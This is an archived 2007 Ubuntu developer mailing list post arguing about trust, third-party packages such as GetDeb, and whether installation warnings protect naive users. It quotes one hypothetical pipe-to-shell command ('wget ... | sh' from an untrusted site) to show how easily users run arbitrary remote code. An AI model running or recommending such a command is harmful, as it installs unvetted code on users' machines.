Untrusted software and security click-through warnings

João Pinto lamego.pinto at gmail.com
Mon Oct 1 22:51:05 UTC 2007 

Ian,
in my opinion there is a major flaw on your assumptions.

If someone is looking for an application "X" and find a site with:
"To get this application just open a terminal and type: Please type: wget -O
- http://best.forubuntu.com | sh" .
Trust me, a naive user will just do it, a power user which trusts that site,
will also do it, maybe, but just maybe it will analyze the page contents.
The issue here is not about the technical process involved, it is about
trust.
If you believe that making software installation more restrictive for such
users will improve security. I believe It will fail.

If PPAs availability increases there will be nasty people providing nasty
packages, if you are concerned about naive users, then my first suggestion
is to present an initial screen during Ubuntu install with:
"If you add extra repositories or install .debs from the web, please make
sure you are using a trusted source, otherwise you may get malicious
software", if it is important enough, let's make it hard to accept, it is a
simple text o read (1 line), there is no excuse for "next -> next".
If the system will be used by other people, then it is his responsibility of
the system administrator (installer) to pass the message or to configure the
system on a safely manner (by not providing admin membership).

The current main benefits of using trusted repositories are for those which
are security aware, naive users do actually press "Install" regardless of
the warning on potential malicious software caused by missing GPG
signatures.
Using trusted repositories provides an higher level of security, it does not
enforce it, it is user's choice to enforce it.

Now let me write a bit about the getdeb project.
We are probably one of the youngest and major 3rd party software providers
for Ubuntu, composed by a small team of Ubuntu/Debian and/or generic Linux
and Open Source supporters.
We do not use an APT repository because the tools required to provide
software, using an easy and presentation extensible technology, with server
side mirrors selection (for load balance and fail over) are not yet
production ready.
The ability to install applications from a browser using APT will be
introduced in Gutsy, (apt url handler, and gapti) still they do not cover
some of our usability concerns, the apt dynamic mirrors selection feature is
still not fully implemented and needs more testing.

On our specific case APT is strong requirement, we are providing >5000
packages and 100GBs of data per day.
Our current success comes from the fact to we server both type of users,
naive users which just need some new software and some newer version to
support their latest gadget, or their latest web service, and power users,
which have the skills to build from source packages but which do not have
enough time to read the install instructions and install all the development
packages for every software that they may need.

Summarizing, I agree with you that it is our responsibility (Ubuntu
community in general) to provide a safe computing environment, however in my
humble opinion those should be pursued with user's education and meeting
reasonable user's needs, and not just by adopting a "make it harder" sense
of security for software installation.

We can continue to discuss about getdeb, that would be something for another
thread, my objective here was just to present my personal point of view
regard your comments. Getdeb is presented as an example of a 3rd party
software provider. We could not have a contractual obligation with Canonical
because we are not a legal entity.

Best regards,

2007/10/1, Ian Jackson <iwj at ubuntu.com>:
>
> João Pinto writes ("RE: Untrusted software and security click-through
> warnings"):
> > I agree with some of  your points, but not with others, anyway your note
> was
> > a notification, not a request for comments.
>
> On the contrary: I'm not the person in Ubuntu who will make this
> decision.  A policy matter like this one ought to be taken by the
> Technical Board.  I was expressing my personal opinion.
>
> So, thanks for your reply and please do feel free to comment in
> detail.  I'd be happy to talk about your project.
>
> ubuntu-devel-discuss would probably be the right list and I have set
> the Reply-To.
>
> Regards,
> Ian.
>



-- 
João Pinto
GetDeb Package Builder
http://www.getdeb.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.ubuntu.com/archives/ubuntu-devel-discuss/attachments/20071001/f5698d02/attachment.html>

More information about the Ubuntu-devel-discuss mailing list